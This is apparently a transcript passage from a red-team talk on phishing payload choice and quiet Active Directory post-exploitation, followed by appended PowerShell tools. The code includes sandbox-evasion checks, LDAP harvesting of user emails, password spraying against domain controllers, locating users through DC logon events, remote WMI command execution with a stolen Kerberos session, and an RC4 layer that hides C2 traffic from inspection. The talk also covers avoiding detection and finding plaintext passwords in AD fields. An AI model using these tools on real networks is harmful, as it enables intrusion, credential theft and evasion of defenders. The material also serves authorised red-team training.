Choose the right payload. For example, if you look at Office 2016, by default the macros are disabled, so you can try as hard as you want, the client is not going to be able to actually run it. So try to avoid macros if you know for a fact that your client is using Office 2016. HTA is super powerful, but it's also highly detected because it's extremely trendy; a lot of people talk about it and it's fairly cool. ClickOnce requires the use of Internet Explorer, and I've hit a case where the whole shop was using Google Chrome and they didn't know how to use Internet Explorer, so they were just trying to load the ClickOnce using Chrome, which was not really successful for me. A plain EXE may be blocked by whitelisting. So depending on which kind of fingerprinting you managed to do on your client, you may actually avoid using one of these specific payloads, because you're going to get detected or it's actually just not going to run. Again, avoid running PowerShell directly too, because it's extremely trendy. So for example, instead of doing a macro
that actually launches WMI, which launches PowerShell, use a macro that launches WMI, which actually launches the PowerShell without ever even invoking powershell.exe. Those little things actually make a huge difference at the end of the day between being detected or not.

So at this point we carefully crafted our phishing campaign and our payload, so we're pretty much ready to go, right? So good news everyone, we have a shell at that point, so it's time for hunting. Now we have access, we need to gather as much information as possible, and you never know: maybe you think you went through and you were super stealthy, but they actually have good detection and they actually detected you. So as fast as possible I'm always going to try to fetch as much information as I can about the internal user base. So I'm going to fetch the username, the email and everything I can, to make sure that I collect this information and can potentially redo a phishing campaign later on with a bigger pool of information. So again, avoid running PowerShell using the net family of commands, because there are a lot of detection rules that are purely based on the function that you're going to call. So if you call net user or something, there's a good chance that you may be detected, if they have detection for that. Try to avoid connecting to all systems at the same time if it's possible, because it's pretty bad and super noisy. The solution, if you want to get the information as fast as possible: personally I use unmanaged PowerShell. You can just send an LDAP query to the Active Directory and get all the information. For Cobalt Strike, PowerPick is the equivalent of unmanaged PowerShell; it's built in, so there's no reason not to do it. ThunderShell by default supports this too, so every time that you're actually invoking PowerShell, you're actually using the unmanaged PowerShell idea. So if you look at this script, I have a command which is called dump user email, which actually just is an LDAP query. So it's going to look for all the users in the LDAP directory and get the mail property. That's all; you're going to get all the mails without having to use SMB or anything else. You're just going to query LDAP directly, and this is usually something that companies do not monitor. Same with usernames: if you want all the usernames, same query, just a different property. There are other options, like more, that can provide you more information about what you're looking for.

If you're feeling a bit more crazy, if I can put it that way, you can actually try to brute-force users after you fetch the list of users. If you feel like you want to brute-force all of these users, why not? So I actually wrote another script that allows you to pass a list of users and a password, and the cool thing about this script is you can actually brute-force users in another forest inside of the domain; you just have to specify the domain that you're looking for. So you can be in domain A and actually brute-force users in domain B. Works pretty well. It's obviously a bit more noisy, because every login attempt is going to generate an event, of course. Try to avoid brute-forcing the same user more than two times, because you may lock out all the accounts. This is not something super stealthy, especially if you don't want to be detected; but if you don't care about being detected, it went super well. Just out of curiosity, the brute-force thing relies on ValidateCredentials, which is a built-in functionality in Windows, and it just connects to the DC, and the DC says whether the credentials are valid or not. That's all.

If you're looking for a specific sAMAccountName, let's say you went on LinkedIn and you found this specific user that seems to be really interesting, there's again a script I wrote which is called search full name to sAMAccountName. You just provide a name and it's going to return the information that is actually inside of the Active Directory. So in this case I'll search for myself inside of the FireEye domain, and as you can see I just specify Hamilton and my name comes out. So you can get the sAMAccountName and you can potentially try to find where this user is actually currently logged in, based on the sAMAccountName, right? You're probably familiar with tools such as Invoke-UserHunter, which basically connects to as many assets as are actually alive in the network and tries to see who's actually logged on the system, right? It's super useful, but extremely noisy too. This technique is a bit less loud: it only connects to the domain controller and looks in the event log for the logon events of the user that you're going to use. The only downside is that you need to have domain admin access at that point. However, usually the way that I'm proceeding is: my first goal is to get domain admin, and from there I'm going to move to the specific target that has access to the application I'm targeting. So at that point in my red team I already have domain admin, so it's not really an issue for me. You just specify your user and wait for the event log to show it up, and you're going to try to get to the application. So you can easily find where the user is actually connected at the moment, so you can target that system later on. Browser bookmarks are really useful too; by default they may push this information in their bookmarks, so all the corporate assets may actually be found in the bookmarks. If you're looking for the intranet and stuff like that, you may actually find it there. Again, Mimikatz sometimes may not work because they may have prevented WDigest from being stored in memory. The cool thing about PowerShell: by default it supports Kerberos tickets. So if you have access to PowerShell, you actually have access to the current user's Kerberos ticket, and I wrote a little script which is called remote WMI execute that allows you to execute commands on a remote host using your current user's Kerberos ticket. So assuming that you currently have access
to other systems, such as a local admin user or something like that, you can just leverage that power to move laterally on the network without actually knowing anyone's password. There's a little downside about Kerberos tickets: sometimes, even if you have a Kerberos ticket, you're going to get access denied. There's a catch-22 with Kerberos tickets that depends on which process you're actually in: it's not going to refresh, so it's just going to time out and never be renewed. So it's really important to pick the right process when you're performing that kind of task, especially if you're using WMI; this is one of the processes that is not necessarily going to renew your Kerberos ticket. So one of the things that I do, again it's a bit noisy, but sometimes we have to be noisy to make sure that we're in a good position, is migrate into the Explorer context; I'm also going to inherit the Kerberos ticket, obviously, so that's my go-to process. But unfortunately Explorer is not a process that really performs network traffic, so it's something that is shady. Apparently on Windows 10 now Explorer actually has tabs and does perform network connections, so it makes this technique a bit less shady. Again, from an OPSEC perspective it's not necessarily the best process to use; however, there are more stealthy targets that you can use, such as svchost or processes that actually perform network traffic. So keep that in mind in the future: you can migrate to these processes and it's a bit more stealthy, because they're known to perform network traffic.

Active Directory contains a lot of valuable information; there are probably like two or three hundred fields for each user, so you'll be surprised by all the information that you can find. I actually have a bunch of utilities that can dump the comment and the description, and you'll be surprised how many times we found actual hard-coded passwords in the comment for service accounts and stuff like that. So just dump all the comments and you'll be surprised. Sometimes they don't change this password for the specific service account, and usually having a service account is really useful from a red team perspective. There's also legacy software that used to use the userPassword field in your Active Directory, which literally stored the user password in clear, so you may actually find that one too.

As I mentioned earlier, you don't necessarily need admin privileges to achieve all your predefined goals with your clients, so if it's an option you can try to avoid it, because most of the noise that you're going to make is to find the right person that has domain admin rights at the beginning. So if you can avoid that part... Unfortunately red team and real life are a bit different, because we're limited in time and budget, right? So the client is paying for your service, so sometimes we have to hack fast because we're just running out of budget or time, so we may have to take risky decisions. But you have to be careful and make sure that you're taking the risky decision for the right reason. Like, as we mentioned earlier, migrating to Explorer is probably something that can be done fairly stealthily and may be extremely valuable for you.
Most Windows commands can be run through PowerShell; that's another thing. Most of the frameworks are just going to spawn cmd, but you can actually use unmanaged PowerShell to run typical cmd commands such as netstat or stuff like that. So you can use PowerPick from Cobalt Strike, or ThunderShell supports that by default, so at least you're not going to have an event that this command has been run, and you're not going to get alerts for that. That's another goal.

These are not super stealthy tricks, but way, way, way useful. My favorite one is Find-LocalAdminAccess. It's actually super noisy, but it's damn useful. The way it works: it's going to connect to all the assets and try to see if the current user has access to the system with local admin privileges. It's so useful because you don't even have to find a local privilege escalation on your current system if you don't want to; you can just move on to the next one where you actually have privileges, so you don't even have to bother doing this. Get-NetDomainTrust is actually super powerful too: you're going to get all the domains, so you may actually find cross-domain policies that leak other users that are actually privileged in your own domain, even if you don't know about it. Same with Get-NetForestTrust; you'll be surprised how many bidirectional trusts we find all the time that are so useful. And Invoke-ShareFinder, looking for shares with valuable information, is something useful too. Get-NetLocalGroup, again, if you're looking for local admins remotely on a system, you can just ask the remote system to give you the list of everything that is considered a local admin, so it's going to include Active Directory groups and local users that also have access to it. So this is something that's really useful, but unfortunately they're mostly extremely noisy, because they're going to connect to most systems and generate a lot of network traffic.

So in conclusion, even if we try to be as stealthy as possible, there's no way to get data without creating some noise at some point. So you just have to choose your battles and decide, okay, I consider this specific part of my actions to be noisy, but it may seem legitimate from a network perspective. But when it's possible, try to adapt your technique and your tools to remain as stealthy as possible with your clients. So again, I gave you some advice; I hope it's going to be useful for you in the future, especially if you're performing a red team, to actually get more data without creating much noise. So a good phishing campaign makes a difference: try to target your company, look at what they like. Crafting a payload is an art, so take your time, don't rush yourself, try to learn, and that's one of the reasons why I wrote all of these tools: I just wanted to have a better understanding, and the best way to learn is by doing it yourself. And again, try to avoid running PowerShell directly at all; I said that throughout the presentation, but I think it's really important to actually do that, because it's easy to detect people that way. That's pretty much it for me, so I hope you enjoyed it. If you have any questions, I guess I'll take some now.
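Added example (editor's code, not the speaker's ClickOnce generator or any tool from the talk): the sandbox checks the talk lists in its "problem with the sandbox" section (memory, disk, CPU count, required process, domain join, time zone, network, uptime, clipboard, inline hooks on ntdll exports) collected into one PowerShell function that returns the indicators it found rather than a single bit. The thresholds, the expected time zone for a Canadian target, and the process names are assumptions to adjust per engagement.

```powershell
# Added example: sandbox-evasion checks from the talk, in one function.
# Thresholds and the expected time zone are assumptions for a fictional Canadian target.
function Test-SandboxIndicators {
    [CmdletBinding()]
    param(
        # Processes the delivery story requires: 'outlook' for a phished mail reader,
        # 'iexplore' when the payload arrived as a ClickOnce application.
        [string[]]$RequiredProcess = @('outlook'),
        [string]$ExpectedTimeZoneId = 'Eastern Standard Time',
        [int]$MinMemoryGB = 4,
        [int]$MinDiskGB = 250,
        [int]$MinLogicalCpus = 2,
        [int]$MinUptimeMinutes = 10
    )
    $indicators = New-Object System.Collections.Generic.List[string]

    $cs = Get-CimInstance -ClassName Win32_ComputerSystem
    if (($cs.TotalPhysicalMemory / 1GB) -lt $MinMemoryGB) { $indicators.Add("RAM below $MinMemoryGB GB") }
    if ($cs.NumberOfLogicalProcessors -lt $MinLogicalCpus) { $indicators.Add("fewer than $MinLogicalCpus logical CPUs") }
    if (-not $cs.PartOfDomain) { $indicators.Add('host is not domain-joined') }

    $disk = Get-CimInstance -ClassName Win32_LogicalDisk -Filter "DeviceID='$env:SystemDrive'"
    if (($disk.Size / 1GB) -lt $MinDiskGB) { $indicators.Add("system drive below $MinDiskGB GB") }

    $os = Get-CimInstance -ClassName Win32_OperatingSystem
    $uptime = (Get-Date) - $os.LastBootUpTime
    if ($uptime.TotalMinutes -lt $MinUptimeMinutes) { $indicators.Add("booted only $([int]$uptime.TotalMinutes) min ago") }

    foreach ($name in $RequiredProcess) {
        if (-not (Get-Process -Name $name -ErrorAction SilentlyContinue)) { $indicators.Add("$name.exe is not running") }
    }

    $tz = [System.TimeZoneInfo]::Local.Id
    if ($tz -ne $ExpectedTimeZoneId) { $indicators.Add("time zone is '$tz', expected '$ExpectedTimeZoneId'") }

    if (-not [System.Net.NetworkInformation.NetworkInterface]::GetIsNetworkAvailable()) {
        $indicators.Add('no network interface is up')
    }

    # Weak signal on its own, but a real user's clipboard is rarely empty mid-day.
    try { if ([string]::IsNullOrEmpty((Get-Clipboard -Raw))) { $indicators.Add('clipboard is empty') } } catch {}

    # Inline-hook check: an unhooked x64 ntdll Nt* stub begins with 4C 8B D1 (mov r10, rcx);
    # a first byte of E9 (jmp rel32) means something patched the export, typically a
    # sandbox or EDR user-mode hook that will fake the answer.
    if (-not ('SandboxCheck.Native' -as [type])) {
        Add-Type -Namespace SandboxCheck -Name Native -MemberDefinition @'
[DllImport("kernel32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern IntPtr GetModuleHandle(string lpModuleName);
[DllImport("kernel32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern IntPtr GetProcAddress(IntPtr hModule, string lpProcName);
'@
    }
    $native = 'SandboxCheck.Native' -as [type]
    $ntdll = $native::GetModuleHandle('ntdll.dll')
    foreach ($api in 'NtCreateFile', 'NtWriteVirtualMemory', 'NtQuerySystemInformation') {
        $addr = $native::GetProcAddress($ntdll, $api)
        if ($addr -ne [IntPtr]::Zero -and [System.Runtime.InteropServices.Marshal]::ReadByte($addr) -eq 0xE9) {
            $indicators.Add("ntdll!$api is inline-hooked")
        }
    }

    [pscustomobject]@{
        LikelySandbox = ($indicators.Count -gt 0)
        Indicators    = $indicators.ToArray()
    }
}

# Gate the real work on the verdict; here only a message is printed.
$verdict = Test-SandboxIndicators -RequiredProcess 'outlook'
if ($verdict.LikelySandbox) { "aborting: $($verdict.Indicators -join '; ')" }
else { 'environment looks like a real endpoint' }
```

Each indicator is individually spoofable, which is why the function reports all of them: a sandbox that fakes RAM and disk size rarely also fakes domain membership, a plausible uptime, an open Outlook and unhooked ntdll exports at the same time. Decide per engagement how many indicators justify aborting.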
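Added example (editor's code, not the speaker's "dump user email", "search full name to sAMAccountName" or brute-force scripts): the LDAP-only hunting the talk describes, done with System.DirectoryServices from the context of a domain user, so nothing touches SMB or spawns net.exe, plus the ValidateCredentials check with a hard cap on attempts per user so the lockout threshold is never approached. The domain name, search base and sample password are assumptions.

```powershell
# Added example: LDAP hunting and credential validation without net.exe or SMB.

$EnabledUser = '(objectCategory=person)(objectClass=user)(!(userAccountControl:1.2.840.113556.1.4.803:=2))'

function ConvertTo-LdapLiteral([string]$Text) {
    # RFC 4515 escaping so a name pasted from LinkedIn cannot rewrite the filter
    $Text -replace '\\', '\5c' -replace '\*', '\2a' -replace '\(', '\28' -replace '\)', '\29' -replace "`0", '\00'
}

function Get-LdapObject {
    param(
        [Parameter(Mandatory)][string]$Filter,
        [Parameter(Mandatory)][string[]]$Property,
        # e.g. 'LDAP://DC=corp,DC=example'; default is the domain the process runs in
        [string]$SearchBase
    )
    $root = if ($SearchBase) { New-Object System.DirectoryServices.DirectoryEntry -ArgumentList $SearchBase }
            else { New-Object System.DirectoryServices.DirectoryEntry }
    $searcher = New-Object System.DirectoryServices.DirectorySearcher -ArgumentList $root, $Filter
    $searcher.PageSize = 1000   # request paging, or the DC stops at MaxPageSize (1000) objects
    foreach ($p in $Property) { [void]$searcher.PropertiesToLoad.Add($p) }
    try {
        foreach ($result in $searcher.FindAll()) {
            $row = [ordered]@{}
            foreach ($p in $Property) { $row[$p] = $result.Properties[$p] | Select-Object -First 1 }
            [pscustomobject]$row
        }
    } finally { $searcher.Dispose() }
}

function Get-DomainUserEmail {
    # One query, one property set: every enabled user that has a mail attribute
    Get-LdapObject -Filter "(&${EnabledUser}(mail=*))" -Property samaccountname, mail
}

function Find-SamAccountByName {
    param([Parameter(Mandatory)][string]$Name)
    # anr = ambiguous name resolution: matches displayName, givenName, sn, sAMAccountName and more
    $safe = ConvertTo-LdapLiteral $Name
    Get-LdapObject -Filter "(&${EnabledUser}(anr=$safe))" -Property samaccountname, displayname, mail, description
}

Add-Type -AssemblyName System.DirectoryServices.AccountManagement
function Test-DomainCredential {
    param(
        [Parameter(Mandatory)][string[]]$SamAccountName,
        [Parameter(Mandatory)][string[]]$Password,
        [string]$Domain = $env:USERDNSDOMAIN,   # any domain this one trusts, so another forest works too
        [int]$MaxAttemptsPerUser = 2            # stay under the lockout threshold; every attempt is a logon event on the DC
    )
    if ($Password.Count -gt $MaxAttemptsPerUser) {
        throw "refusing $($Password.Count) passwords per user; lockout risk"
    }
    $ctx = New-Object System.DirectoryServices.AccountManagement.PrincipalContext -ArgumentList ([System.DirectoryServices.AccountManagement.ContextType]::Domain), $Domain
    try {
        foreach ($user in $SamAccountName) {
            foreach ($pass in $Password) {
                # ValidateCredentials asks the DC; it never touches the target workstation
                if ($ctx.ValidateCredentials($user, $pass)) { [pscustomobject]@{ User = $user; Password = $pass }; break }
            }
        }
    } finally { $ctx.Dispose() }
}

# Usage (assumed domain corp.example and an assumed candidate password):
# Get-DomainUserEmail | Export-Csv -NoTypeInformation users.csv
# Find-SamAccountByName -Name 'Hamilton'
# $users = (Get-LdapObject -Filter "(&${EnabledUser})" -Property samaccountname).samaccountname
# Test-DomainCredential -SamAccountName $users -Password 'Winter2018!' -Domain 'corp.example'
```

The LDAP reads generate no logon events on workstations and, as the talk notes, are rarely monitored; the credential check is the opposite, so the attempt cap is enforced in code rather than left to discipline.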
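Added example (editor's code, not the speaker's scripts): locating a user by reading the domain controller's Security log for that account's logon events, instead of sweeping every host the way Invoke-UserHunter does, and then executing on the host found over WMI with the current logon session's Kerberos ticket and no password. As the talk says, reading the DC's Security log needs privileged access, domain admin in practice. The DC name, user and command are assumptions.

```powershell
# Added example: find where a user logs on from via the DC's 4624 events, then run a command there via WMI.

function Find-UserLogonSource {
    param(
        [Parameter(Mandatory)][string]$SamAccountName,
        [Parameter(Mandatory)][string]$DomainController,
        [int]$LookbackHours = 8,
        [int]$MaxEvents = 500
    )
    # Server-side XPath filter: only 4624 for this account within the window is shipped back
    $windowMs = $LookbackHours * 3600000
    $xpath = "*[System[EventID=4624 and TimeCreated[timediff(@SystemTime) <= $windowMs]] and " +
             "EventData[Data[@Name='TargetUserName']='$SamAccountName']]"

    Get-WinEvent -ComputerName $DomainController -LogName Security -FilterXPath $xpath -MaxEvents $MaxEvents -ErrorAction SilentlyContinue |
        ForEach-Object {
            $xml  = [xml]$_.ToXml()
            $data = @{}
            foreach ($d in $xml.Event.EventData.Data) { $data[$d.Name] = $d.'#text' }
            [pscustomobject]@{
                Time       = $_.TimeCreated
                LogonType  = [int]$data['LogonType']     # 3 = network (workstation reading SYSVOL/GPO from the DC), 10 = RDP
                SourceHost = $data['WorkstationName']
                SourceIP   = $data['IpAddress']
            }
        } |
        Where-Object { $_.SourceIP -and $_.SourceIP -notin '-', '127.0.0.1', '::1' } |
        Group-Object SourceIP | ForEach-Object {
            $latest = $_.Group | Sort-Object Time -Descending | Select-Object -First 1
            [pscustomobject]@{ SourceIP = $_.Name; SourceHost = $latest.SourceHost; LastSeen = $latest.Time; Logons = $_.Count }
        } | Sort-Object LastSeen -Descending
}

function Invoke-RemoteWmiCommand {
    param(
        [Parameter(Mandatory)][string]$ComputerName,
        [Parameter(Mandatory)][string]$CommandLine
    )
    # No -Credential: DCOM authenticates with the current logon session, i.e. the
    # Kerberos ticket already in this process, as the talk describes.
    $r = Invoke-WmiMethod -ComputerName $ComputerName -Class Win32_Process -Name Create -ArgumentList $CommandLine
    [pscustomobject]@{ Target = $ComputerName; ReturnValue = $r.ReturnValue; ProcessId = $r.ProcessId }
}

# Usage (assumed names):
# $where = Find-UserLogonSource -SamAccountName 'jdoe' -DomainController 'dc01.corp.example'
# $where | Format-Table
# Invoke-RemoteWmiCommand -ComputerName $where[0].SourceIP -CommandLine 'cmd.exe /c whoami > C:\Windows\Temp\w.txt'
```

A 4624 on the DC records a logon to the DC itself (typically type 3 from the user's workstation fetching policy), so IpAddress is the workstation, not the DC; if the environment logs 4768/4769, the same pattern over those Kerberos events gives the same answer. ReturnValue 0 from Win32_Process.Create means the process started; anything else (for example 2 or 5) means the remote host rejected the request, which is also what happens when the Kerberos ticket the talk warns about has expired in the process you are running from.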
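Added example (editor's code, not ThunderShell's): a minimal RC4 layer of the kind the talk describes, to show what a network minifilter sees after the OS has stripped TLS. Server and implant share $sharedKey; the key, the task text and the base64 framing are assumptions. RC4 with a static shared key hides the body from inspection but provides no integrity, no replay protection and no forward secrecy; it is an evasion layer, which is why the talk still wraps it in HTTPS, and it is not a substitute for that TLS.

```powershell
# Added example: the RC4-inside-HTTPS idea from the talk, as a self-contained round trip.

function Invoke-Rc4 {
    param([Parameter(Mandatory)][byte[]]$Key, [Parameter(Mandatory)][byte[]]$Data)
    # Key-scheduling algorithm
    $S = [int[]](0..255)
    $j = 0
    for ($i = 0; $i -lt 256; $i++) {
        $j = ($j + $S[$i] + $Key[$i % $Key.Length]) -band 0xFF
        $t = $S[$i]; $S[$i] = $S[$j]; $S[$j] = $t
    }
    # Pseudo-random generation XORed over the data; RC4 is symmetric, so the same call decrypts
    $out = New-Object byte[] $Data.Length
    $i = 0; $j = 0
    for ($k = 0; $k -lt $Data.Length; $k++) {
        $i = ($i + 1) -band 0xFF
        $j = ($j + $S[$i]) -band 0xFF
        $t = $S[$i]; $S[$i] = $S[$j]; $S[$j] = $t
        $out[$k] = $Data[$k] -bxor $S[($S[$i] + $S[$j]) -band 0xFF]
    }
    return ,$out
}

function Protect-Message([string]$Key, [string]$Text) {
    # What the C2 server puts in the HTTPS body: base64 of RC4(UTF-8 text)
    $cipher = Invoke-Rc4 -Key ([Text.Encoding]::UTF8.GetBytes($Key)) -Data ([Text.Encoding]::UTF8.GetBytes($Text))
    [Convert]::ToBase64String($cipher)
}

function Unprotect-Message([string]$Key, [string]$Body) {
    # What the implant does after the OS has already decrypted TLS for it
    $plain = Invoke-Rc4 -Key ([Text.Encoding]::UTF8.GetBytes($Key)) -Data ([Convert]::FromBase64String($Body))
    [Text.Encoding]::UTF8.GetString($plain)
}

function Test-Rc4KnownAnswer {
    # Published RC4 test vector: Key = "Key", Plaintext = "Plaintext" -> BBF316E8D940AF0AD3
    $c = Invoke-Rc4 -Key ([Text.Encoding]::ASCII.GetBytes('Key')) -Data ([Text.Encoding]::ASCII.GetBytes('Plaintext'))
    (($c | ForEach-Object { $_.ToString('X2') }) -join '') -eq 'BBF316E8D940AF0AD3'
}

# Round trip with an assumed shared key and an assumed task
$sharedKey = 'example-shared-key-replace-me'
$task = 'Get-Process | Select-Object -First 5'
$body = Protect-Message -Key $sharedKey -Text $task
"minifilter sees:  $body"
"implant decrypts: $(Unprotect-Message -Key $sharedKey -Body $body)"
"known-answer ok:  $(Test-Rc4KnownAnswer)"
```

The known-answer check is there so the implementation can be trusted before the server and implant halves are split apart; a mismatch between the two sides shows up as gibberish, not as an error. Because the key ships with the implant, anyone who recovers the script can decrypt captured bodies, so treat the RC4 layer as defeating inline inspection only, never as protecting the traffic from a capable analyst.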